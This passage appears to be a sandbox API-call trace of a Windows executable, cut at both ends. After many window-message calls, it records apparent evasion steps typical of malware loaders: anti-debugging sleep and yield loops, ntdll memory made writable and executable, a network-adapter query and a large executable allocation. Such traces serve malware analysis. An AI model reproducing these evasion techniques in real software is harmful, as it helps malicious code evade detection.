returned 0 [0057.650] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.650] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.650] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.650] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.650] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.650] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.650] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.650] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, 
lParam=0x12f134) returned 0x0 [0057.650] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.650] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.650] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.650] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.651] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.651] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.651] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.651] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.651] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.651] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.651] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.651] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.651] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.651] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.651] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.651] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.651] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.651] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.651] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.651] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.651] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.652] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.652] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.652] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.652] 
DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.652] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.652] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.652] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.652] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.652] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.652] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.652] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.652] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.652] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.652] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.652] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.652] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.652] ShowWindow (hWnd=0x601a8, nCmdShow=1) returned 0 [0057.652] DefWindowProcA (hWnd=0x601a8, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0057.653] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12fb40) returned 0x0 [0057.653] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12fb40) returned 0x0 [0057.672] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12fb40) returned 0x0 [0057.672] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12fb40) returned 0x0 [0057.672] DefWindowProcA (hWnd=0x601a8, Msg=0x1c, wParam=0x1, lParam=0x960) returned 0x0 [0057.672] DefWindowProcA (hWnd=0x301fc, Msg=0x1c, wParam=0x1, lParam=0x960) returned 0x0 [0057.672] GetWindowLongA (hWnd=0x401e4, nIndex=0) returned 28713116 [0057.672] DefWindowProcA (hWnd=0x601a8, Msg=0x86, wParam=0x1, lParam=0x0) returned 0x1 [0057.672] IsIconic (hWnd=0x601a8) returned 0 [0057.672] GetFocus () returned 0x0 [0057.672] GetFocus () returned 0x0 [0057.672] 
IsWindowEnabled (hWnd=0x601a8) returned 1 [0057.672] GetWindowThreadProcessId (in: hWnd=0x601a8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb88 [0057.672] GetCurrentThreadId () returned 0xb88 [0057.672] SetFocus (hWnd=0x601a8) returned 0x0 [0057.674] DefWindowProcA (hWnd=0x601a8, Msg=0x281, wParam=0x1, lParam=0xc000000f) returned 0x0 [0057.674] DefWindowProcA (hWnd=0x601a8, Msg=0x282, wParam=0x2, lParam=0x0) returned 0x0 [0057.675] IsIconic (hWnd=0x601a8) returned 0 [0057.675] GetFocus () returned 0x601a8 [0057.675] DefWindowProcA (hWnd=0x601a8, Msg=0x7, wParam=0x0, lParam=0x0) returned 0x0 [0057.675] IsWindowEnabled (hWnd=0x601a8) returned 1 [0057.675] PostMessageA (hWnd=0x601a8, Msg=0x100e, wParam=0xa, lParam=0x0) returned 1 [0057.675] IsIconic (hWnd=0x601a8) returned 0 [0057.675] PostMessageA (hWnd=0x601a8, Msg=0x100e, wParam=0xe, lParam=0x0) returned 1 [0057.675] PostMessageA (hWnd=0x601a8, Msg=0x105a, wParam=0x0, lParam=0x0) returned 1 [0057.676] DefWindowProcA (hWnd=0x601a8, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0057.676] IsIconic (hWnd=0x601a8) returned 0 [0057.676] IsIconic (hWnd=0x601a8) returned 0 [0057.676] GetParent (hWnd=0x601a8) returned 0x0 [0057.676] GetWindowRect (in: hWnd=0x601a8, lpRect=0x12f780 | out: lpRect=0x12f780) returned 1 [0057.676] DefWindowProcA (hWnd=0x601a8, Msg=0x47, wParam=0x0, lParam=0x12fb40) returned 0x0 [0057.676] GetWindowLongA (hWnd=0x601a8, nIndex=-16) returned 369098752 [0057.676] GetClientRect (in: hWnd=0x601a8, lpRect=0x12f7f0 | out: lpRect=0x12f7f0) returned 1 [0057.676] MapWindowPoints (in: hWndFrom=0x601a8, hWndTo=0x0, lpPoints=0x12f7f0, cPoints=0x2 | out: lpPoints=0x12f7f0) returned 17629216 [0057.676] IsWindowVisible (hWnd=0x601a8) returned 1 [0057.676] IsIconic (hWnd=0x601a8) returned 0 [0057.676] IsZoomed (hWnd=0x601a8) returned 0 [0057.676] DefWindowProcA (hWnd=0x601a8, Msg=0x5, wParam=0x0, lParam=0xb014d) returned 0x0 [0057.677] GetUserDefaultLCID () returned 0x409 [0057.677] VarBstrFromI2 
(iVal=1, lcid=0x409, dwFlags=0x0, pbstrOut=0x12f670*="鰵犠滴犔麸犠ꁢ犠냿犠滴犔놹犠") returned 0x0 [0057.677] GetClientRect (in: hWnd=0x601a8, lpRect=0x12f7c8 | out: lpRect=0x12f7c8) returned 1 [0057.677] GetWindow (hWnd=0x601a8, uCmd=0x5) returned 0x0 [0057.677] DefWindowProcA (hWnd=0x601a8, Msg=0x3, wParam=0x0, lParam=0x10d0020) returned 0x0 [0057.677] GetCurrentThreadId () returned 0xb88 [0057.677] PostThreadMessageA (idThread=0xb88, Msg=0x1069, wParam=0x0, lParam=0x0) returned 1 [0057.677] GetCurrentProcessId () returned 0xb84 [0057.677] PeekMessageA (in: lpMsg=0x12fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x12fe58) returned 1 [0057.677] IsWindow (hWnd=0x601a8) returned 1 [0057.677] GetWindowLongA (hWnd=0x601a8, nIndex=-16) returned 369098752 [0057.677] IsIconic (hWnd=0x601a8) returned 0 [0057.677] GetParent (hWnd=0x601a8) returned 0x0 [0057.677] TranslateMessage (lpMsg=0x12fe58) returned 0 [0057.677] DispatchMessageA (lpMsg=0x12fe58) returned 0x0 [0057.677] PeekMessageA (in: lpMsg=0x12fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x12fe58) returned 1 [0057.678] IsWindow (hWnd=0x601a8) returned 1 [0057.678] GetWindowLongA (hWnd=0x601a8, nIndex=-16) returned 369098752 [0057.678] IsIconic (hWnd=0x601a8) returned 0 [0057.678] GetParent (hWnd=0x601a8) returned 0x0 [0057.678] TranslateMessage (lpMsg=0x12fe58) returned 0 [0057.678] DispatchMessageA (lpMsg=0x12fe58) returned 0x0 [0057.678] PeekMessageA (in: lpMsg=0x12fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x12fe58) returned 1 [0057.678] IsWindow (hWnd=0x601a8) returned 1 [0057.678] GetWindowLongA (hWnd=0x601a8, nIndex=-16) returned 369098752 [0057.678] IsIconic (hWnd=0x601a8) returned 0 [0057.678] GetParent (hWnd=0x601a8) returned 0x0 [0057.678] TranslateMessage (lpMsg=0x12fe58) returned 0 [0057.678] DispatchMessageA (lpMsg=0x12fe58) returned 0x0 [0057.678] GetActiveWindow () returned 0x601a8 [0057.678] 
GetWindowThreadProcessId (in: hWnd=0x601a8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb88 [0057.678] GetFocus () returned 0x601a8 [0057.685] PeekMessageA (in: lpMsg=0x12fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x12fe58) returned 1 [0057.685] TranslateMessage (lpMsg=0x12fe58) returned 0 [0057.685] DispatchMessageA (lpMsg=0x12fe58) returned 0x0 [0057.685] PeekMessageA (in: lpMsg=0x12fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x12fe58) returned 1 [0057.685] IsWindow (hWnd=0x601a8) returned 1 [0057.685] GetWindowLongA (hWnd=0x601a8, nIndex=-16) returned 369098752 [0057.685] IsIconic (hWnd=0x601a8) returned 0 [0057.685] GetParent (hWnd=0x601a8) returned 0x0 [0057.685] TranslateMessage (lpMsg=0x12fe58) returned 0 [0057.685] DispatchMessageA (lpMsg=0x12fe58) [0057.685] IsIconic (hWnd=0x601a8) returned 0 [0057.685] IsIconic (hWnd=0x601a8) returned 0 [0057.685] BeginPaint (in: hWnd=0x601a8, lpPaint=0x12fa1c | out: lpPaint=0x12fa1c) returned 0x2a0107b2 [0057.685] GetClientRect (in: hWnd=0x601a8, lpRect=0x12fa5c | out: lpRect=0x12fa5c) returned 1 [0057.685] OleTranslateColor () returned 0x0 [0057.685] OleTranslateColor () returned 0x0 [0057.685] CreateSolidBrush (color=0xf0f0f0) returned 0xf110078f [0057.685] OleTranslateColor () returned 0x0 [0057.685] OleTranslateColor () returned 0x0 [0057.685] SetTextColor (hdc=0x2a0107b2, color=0x0) returned 0x0 [0057.685] SetBkColor (hdc=0x2a0107b2, color=0xf0f0f0) returned 0xf0f0f0 [0057.685] FillRect (hDC=0x2a0107b2, lprc=0x12fa5c, hbr=0xf110078f) returned 1 [0057.685] SetTextColor (hdc=0x2a0107b2, color=0x0) returned 0x0 [0057.685] SetBkColor (hdc=0x2a0107b2, color=0xf0f0f0) returned 0xf0f0f0 [0057.685] EndPaint (hWnd=0x601a8, lpPaint=0x12fa1c) returned 1 [0057.685] DefWindowProcA (hWnd=0x601a8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xb [0057.686] DefWindowProcA (hWnd=0x601a8, Msg=0xd, wParam=0xc, lParam=0x1b73458) returned 0xb [0057.686] 
MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1b73458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0057.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1b73458, cbMultiByte=-1, lpWideCharStr=0x1e0e6c, cchWideChar=12 | out: lpWideCharStr="Delstaterne") returned 12 [0057.686] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MS Sans Serif", cchWideChar=-1, lpMultiByteStr=0x12f75c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS Sans Serif", lpUsedDefaultChar=0x0) returned 14 [0057.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1b73458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0057.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1b73458, cbMultiByte=-1, lpWideCharStr=0x1e0e94, cchWideChar=14 | out: lpWideCharStr="MS Sans Serif") returned 14 [0057.687] VarBstrCmp (bstrLeft="Delstaterne", bstrRight="MS Sans Serif", lcid=0x0, dwFlags=0x30001) returned 0x0 [0057.687] IsWindowVisible (hWnd=0x601a8) returned 1 [0057.687] IsIconic (hWnd=0x601a8) returned 0 [0057.687] IsZoomed (hWnd=0x601a8) returned 0 [0057.687] ShowWindow (hWnd=0x601a8, nCmdShow=0) returned 1 [0057.687] DefWindowProcA (hWnd=0x601a8, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0057.687] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f3b0) returned 0x0 [0057.687] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f3b0) returned 0x0 [0057.687] GetParent (hWnd=0x601a8) returned 0x0 [0057.687] GetWindowRect (in: hWnd=0x601a8, lpRect=0x12eff0 | out: lpRect=0x12eff0) returned 1 [0057.687] DefWindowProcA (hWnd=0x601a8, Msg=0x47, wParam=0x0, lParam=0x12f3b0) returned 0x0 [0057.687] GetWindowLongA (hWnd=0x601a8, nIndex=-16) returned 100663296 [0057.687] GetClientRect (in: hWnd=0x601a8, lpRect=0x12f060 | out: lpRect=0x12f060) returned 1 
[0057.687] MapWindowPoints (in: hWndFrom=0x601a8, hWndTo=0x0, lpPoints=0x12f060, cPoints=0x2 | out: lpPoints=0x12f060) returned 17629216 [0057.687] DefWindowProcA (hWnd=0x601a8, Msg=0x86, wParam=0x0, lParam=0x0) returned 0x1 [0057.687] GetFocus () returned 0x601a8 [0057.687] GetClassInfoA (in: hInstance=0x72940000, lpClassName="COMBOBOX", lpWndClass=0x12f044 | out: lpWndClass=0x12f044) returned 1 [0057.688] DefWindowProcA (hWnd=0x601a8, Msg=0x1c, wParam=0x0, lParam=0x960) returned 0x0 [0057.688] DefWindowProcA (hWnd=0x301fc, Msg=0x1c, wParam=0x0, lParam=0x960) returned 0x0 [0057.688] GetWindowLongA (hWnd=0x401e4, nIndex=0) returned 28713116 [0057.688] DefWindowProcA (hWnd=0x601a8, Msg=0x8, wParam=0x0, lParam=0x0) returned 0x0 [0057.688] DefWindowProcA (hWnd=0x601a8, Msg=0x281, wParam=0x0, lParam=0xc000000f) returned 0x0 [0057.688] DefWindowProcA (hWnd=0x601a8, Msg=0x282, wParam=0x1, lParam=0x0) returned 0x0 [0057.688] SetErrorMode (uMode=0x8001) returned 0x8001 [0057.688] LoadLibraryA (lpLibFileName="NTDLL") returned 0x76f50000 [0057.688] SetErrorMode (uMode=0x8001) returned 0x8001 [0057.688] GetProcAddress (hModule=0x76f50000, lpProcName="ZwSetInformationProcess") returned 0x76f96678 [0057.688] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x22, ProcessInformation=0x400004, ProcessInformationLength=0x4) returned 0x0 [0057.690] SetErrorMode (uMode=0x8001) returned 0x8001 [0057.690] LoadLibraryA (lpLibFileName="kernel32") returned 0x76c10000 [0057.690] SetErrorMode (uMode=0x8001) returned 0x8001 [0057.690] GetProcAddress (hModule=0x76c10000, lpProcName="Sleep") returned 0x76c5ba46 [0057.690] SetErrorMode (uMode=0x8001) returned 0x8001 [0057.690] LoadLibraryA (lpLibFileName="user32") returned 0x76620000 [0057.690] SetErrorMode (uMode=0x8001) returned 0x8001 [0057.690] GetProcAddress (hModule=0x76620000, lpProcName="GetDesktopWindow") returned 0x766301a9 [0057.690] GetDesktopWindow () returned 0x10010 [0057.690] SetErrorMode (uMode=0x8001) 
returned 0x8001 [0057.690] LoadLibraryA (lpLibFileName="kernel32") returned 0x76c10000 [0057.690] SetErrorMode (uMode=0x8001) returned 0x8001 [0057.690] GetProcAddress (hModule=0x76c10000, lpProcName="HeapAlloc") returned 0x76fa2dd6 [0057.690] SetErrorMode (uMode=0x8001) returned 0x8001 [0057.690] LoadLibraryA (lpLibFileName="kernel32") returned 0x76c10000 [0057.690] SetErrorMode (uMode=0x8001) returned 0x8001 [0057.691] GetProcAddress (hModule=0x76c10000, lpProcName="SetLastError") returned 0x76c5bb08 [0057.691] SetLastError (dwErrCode=0x5) [0057.691] SetErrorMode (uMode=0x8001) returned 0x8001 [0057.691] LoadLibraryA (lpLibFileName="kernel32") returned 0x76c10000 [0057.691] SetErrorMode (uMode=0x8001) returned 0x8001 [0057.691] GetProcAddress (hModule=0x76c10000, lpProcName="SetErrorMode") returned 0x76c64a51 [0057.691] SetErrorMode (uMode=0x400) returned 0x8001 [0057.691] SetErrorMode (uMode=0x0) returned 0x400 [0057.691] SetErrorMode (uMode=0x8001) returned 0x0 [0057.691] LoadLibraryA (lpLibFileName="ntdll") returned 0x76f50000 [0057.691] SetErrorMode (uMode=0x0) returned 0x8001 [0057.691] GetProcAddress (hModule=0x76f50000, lpProcName="NtYieldExecution") returned 0x76f96aa8 [0057.691] Sleep (dwMilliseconds=0xf) [0057.694] NtYieldExecution () returned 0x0 [0057.711] Sleep (dwMilliseconds=0xf) [0057.735] NtYieldExecution () returned 0x0 [0057.736] Sleep (dwMilliseconds=0xf) [0057.741] NtYieldExecution () returned 0x0 [0057.759] Sleep (dwMilliseconds=0xf) [0057.795] NtYieldExecution () returned 0x0 [0057.796] Sleep (dwMilliseconds=0xf) [0057.803] NtYieldExecution () returned 0x40000024 [0057.803] Sleep (dwMilliseconds=0xf) [0057.822] NtYieldExecution () returned 0x40000024 [0057.822] Sleep (dwMilliseconds=0xf) [0057.834] NtYieldExecution () returned 0x40000024 [0057.834] Sleep (dwMilliseconds=0xf) [0057.853] NtYieldExecution () returned 0x40000024 [0057.853] Sleep (dwMilliseconds=0xf) [0057.873] NtYieldExecution () returned 0x40000024 [0057.873] Sleep 
(dwMilliseconds=0xf) [0057.881] NtYieldExecution () returned 0x40000024 [0057.881] Sleep (dwMilliseconds=0xf) [0057.898] NtYieldExecution () returned 0x40000024 [0057.898] Sleep (dwMilliseconds=0xf) [0057.912] NtYieldExecution () returned 0x40000024 [0057.912] Sleep (dwMilliseconds=0xf) [0057.928] NtYieldExecution () returned 0x40000024 [0057.928] Sleep (dwMilliseconds=0xf) [0057.944] NtYieldExecution () returned 0x40000024 [0057.944] Sleep (dwMilliseconds=0xf) [0057.959] NtYieldExecution () returned 0x40000024 [0057.959] Sleep (dwMilliseconds=0xf) [0057.975] NtYieldExecution () returned 0x40000024 [0057.975] Sleep (dwMilliseconds=0xf) [0057.990] NtYieldExecution () returned 0x40000024 [0057.990] Sleep (dwMilliseconds=0xf) [0058.006] NtYieldExecution () returned 0x40000024 [0058.006] Sleep (dwMilliseconds=0xf) [0058.022] NtYieldExecution () returned 0x40000024 [0058.022] Sleep (dwMilliseconds=0xf) [0058.037] NtYieldExecution () returned 0x40000024 [0058.037] Sleep (dwMilliseconds=0xf) [0058.053] NtYieldExecution () returned 0x0 [0058.053] Sleep (dwMilliseconds=0xf) [0058.069] NtYieldExecution () returned 0x40000024 [0058.069] Sleep (dwMilliseconds=0xf) [0058.084] NtYieldExecution () returned 0x40000024 [0058.084] Sleep (dwMilliseconds=0xf) [0058.100] NtYieldExecution () returned 0x40000024 [0058.100] Sleep (dwMilliseconds=0xf) [0058.115] NtYieldExecution () returned 0x0 [0058.115] Sleep (dwMilliseconds=0xf) [0058.131] NtYieldExecution () returned 0x40000024 [0058.131] Sleep (dwMilliseconds=0xf) [0058.147] NtYieldExecution () returned 0x40000024 [0058.147] Sleep (dwMilliseconds=0xf) [0058.162] NtYieldExecution () returned 0x40000024 [0058.162] Sleep (dwMilliseconds=0xf) [0058.178] NtYieldExecution () returned 0x40000024 [0058.178] Sleep (dwMilliseconds=0xf) [0058.194] NtYieldExecution () returned 0x40000024 [0058.194] Sleep (dwMilliseconds=0xf) [0058.209] NtYieldExecution () returned 0x40000024 [0058.209] Sleep (dwMilliseconds=0xf) [0058.225] NtYieldExecution () 
returned 0x40000024 [0058.225] Sleep (dwMilliseconds=0x1f40) [0066.228] SetErrorMode (uMode=0x8001) returned 0x0 [0066.228] LoadLibraryA (lpLibFileName="ntdll") returned 0x76f50000 [0066.228] SetErrorMode (uMode=0x0) returned 0x8001 [0066.229] GetProcAddress (hModule=0x76f50000, lpProcName="NtProtectVirtualMemory") returned 0x76f95f18 [0066.229] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x12d7c4*=0x76f51000, NumberOfBytesToProtect=0x12d7c8, NewAccessProtection=0x40, OldAccessProtection=0x12d7cc | out: BaseAddress=0x12d7c4*=0x76f51000, NumberOfBytesToProtect=0x12d7c8, OldAccessProtection=0x12d7cc*=0x20) returned 0x0 [0066.235] SetErrorMode (uMode=0x8001) returned 0x0 [0066.235] LoadLibraryA (lpLibFileName="advapi32") returned 0x754d0000 [0066.235] SetErrorMode (uMode=0x0) returned 0x8001 [0066.235] GetProcAddress (hModule=0x754d0000, lpProcName="RegOpenKeyExA") returned 0x754e4907 [0066.236] SetErrorMode (uMode=0x8001) returned 0x0 [0066.236] LoadLibraryA (lpLibFileName="advapi32") returned 0x754d0000 [0066.236] SetErrorMode (uMode=0x0) returned 0x8001 [0066.236] GetProcAddress (hModule=0x754d0000, lpProcName="RegQueryValueExA") returned 0x754e48ef [0066.236] SetErrorMode (uMode=0x8001) returned 0x0 [0066.236] LoadLibraryA (lpLibFileName="advapi32") returned 0x754d0000 [0066.236] SetErrorMode (uMode=0x0) returned 0x8001 [0066.236] GetProcAddress (hModule=0x754d0000, lpProcName="RegCloseKey") returned 0x754e469d [0066.236] SetErrorMode (uMode=0x8001) returned 0x0 [0066.236] LoadLibraryA (lpLibFileName="kernel32") returned 0x76c10000 [0066.236] SetErrorMode (uMode=0x0) returned 0x8001 [0066.236] GetProcAddress (hModule=0x76c10000, lpProcName="CreateFileA") returned 0x76c5cee8 [0066.236] SetErrorMode (uMode=0x8001) returned 0x0 [0066.236] LoadLibraryA (lpLibFileName="kernel32") returned 0x76c10000 [0066.236] SetErrorMode (uMode=0x0) returned 0x8001 [0066.236] GetProcAddress (hModule=0x76c10000, lpProcName="WriteFile") returned 0x76c61400 
[0066.236] SetErrorMode (uMode=0x8001) returned 0x0 [0066.236] LoadLibraryA (lpLibFileName="kernel32") returned 0x76c10000 [0066.236] SetErrorMode (uMode=0x0) returned 0x8001 [0066.236] GetProcAddress (hModule=0x76c10000, lpProcName="CloseHandle") returned 0x76c5ca7c [0066.236] SetErrorMode (uMode=0x8001) returned 0x0 [0066.236] LoadLibraryA (lpLibFileName="kernel32") returned 0x76c10000 [0066.237] SetErrorMode (uMode=0x0) returned 0x8001 [0066.237] GetProcAddress (hModule=0x76c10000, lpProcName="ReadFile") returned 0x76c596fb [0066.237] SetErrorMode (uMode=0x8001) returned 0x0 [0066.237] LoadLibraryA (lpLibFileName="kernel32") returned 0x76c10000 [0066.237] SetErrorMode (uMode=0x0) returned 0x8001 [0066.237] GetProcAddress (hModule=0x76c10000, lpProcName="GetFileSize") returned 0x76c50273 [0066.237] SetErrorMode (uMode=0x8001) returned 0x0 [0066.237] LoadLibraryA (lpLibFileName="kernel32") returned 0x76c10000 [0066.237] SetErrorMode (uMode=0x0) returned 0x8001 [0066.237] GetProcAddress (hModule=0x76c10000, lpProcName="UnmapViewOfFile") returned 0x76c5db13 [0066.237] SetErrorMode (uMode=0x8001) returned 0x0 [0066.237] LoadLibraryA (lpLibFileName="kernel32") returned 0x76c10000 [0066.237] SetErrorMode (uMode=0x0) returned 0x8001 [0066.237] GetProcAddress (hModule=0x76c10000, lpProcName="VirtualProtectEx") returned 0x76c9f5d9 [0066.237] SetErrorMode (uMode=0x8001) returned 0x0 [0066.237] LoadLibraryA (lpLibFileName="kernel32") returned 0x76c10000 [0066.237] SetErrorMode (uMode=0x0) returned 0x8001 [0066.237] GetProcAddress (hModule=0x76c10000, lpProcName="GetLongPathNameA") returned 0x76c9f47f [0066.237] SetErrorMode (uMode=0x8001) returned 0x0 [0066.237] LoadLibraryA (lpLibFileName="kernel32") returned 0x76c10000 [0066.237] SetErrorMode (uMode=0x0) returned 0x8001 [0066.238] GetProcAddress (hModule=0x76c10000, lpProcName="TerminateProcess") returned 0x76c52331 [0066.238] SetErrorMode (uMode=0x8001) returned 0x0 [0066.238] LoadLibraryA (lpLibFileName="IPHlpApi") 
returned 0x733c0000 [0066.240] SetErrorMode (uMode=0x0) returned 0x8001 [0066.240] GetProcAddress (hModule=0x733c0000, lpProcName="GetAdaptersInfo") returned 0x733c9263 [0066.240] SetErrorMode (uMode=0x8001) returned 0x0 [0066.240] LoadLibraryA (lpLibFileName="kernel32") returned 0x76c10000 [0066.240] SetErrorMode (uMode=0x0) returned 0x8001 [0066.240] GetProcAddress (hModule=0x76c10000, lpProcName="VirtualAllocEx") returned 0x76c4c1b6 [0066.240] VirtualAllocEx (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x3a0000 [0066.241] GetAdaptersInfo (in: AdapterInfo=0x3a0000, SizePointer=0x12d7d4 | out: AdapterInfo=0x3a0000, SizePointer=0x12d7d4) returned 0x0 [0066.247] SetErrorMode (uMode=0x8001) returned 0x0 [0066.247] LoadLibraryA (lpLibFileName="shell32") returned 0x75810000 [0066.251] SetErrorMode (uMode=0x0) returned 0x8001 [0066.251] GetProcAddress (hModule=0x75810000, lpProcName="ShellExecuteA") returned 0x75a57078 [0066.251] SetErrorMode (uMode=0x8001) returned 0x0 [0066.251] LoadLibraryA (lpLibFileName="User32") returned 0x76620000 [0066.251] SetErrorMode (uMode=0x0) returned 0x8001 [0066.251] GetProcAddress (hModule=0x76620000, lpProcName="EnumWindows") returned 0x7663375b [0066.251] EnumWindows (lpEnumFunc=0x12db4f, lParam=0x12d878) returned 1 [0066.253] VirtualAllocEx (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x8000000, flAllocationType=0x3000, flProtect=0x40) returned 0x2200000 [0066.263] SetErrorMode (uMode=0x8001) returned 0x0 [0066.263] LoadLibraryA (lpLibFileName="user32") returned 0x76620000 [0066.263] SetErrorMode (uMode=0x0) returned 0x8001 [0066.263] GetProcAddress (hModule=0x76620000, lpProcName="DestroyWindow") returned 0x7662b2f4 [0066.263] SetErrorMode (uMode=0x8001) returned 0x0 [0066.263] LoadLibraryA (lpLibFileName="user32") returned 0x76620000 [0066.263] SetErrorMode (uMode=0x0) returned 0x8001 [0066.263] GetProcAddress (hModule=0x76620000, lpProcName="EnumThreadWindows") returned 
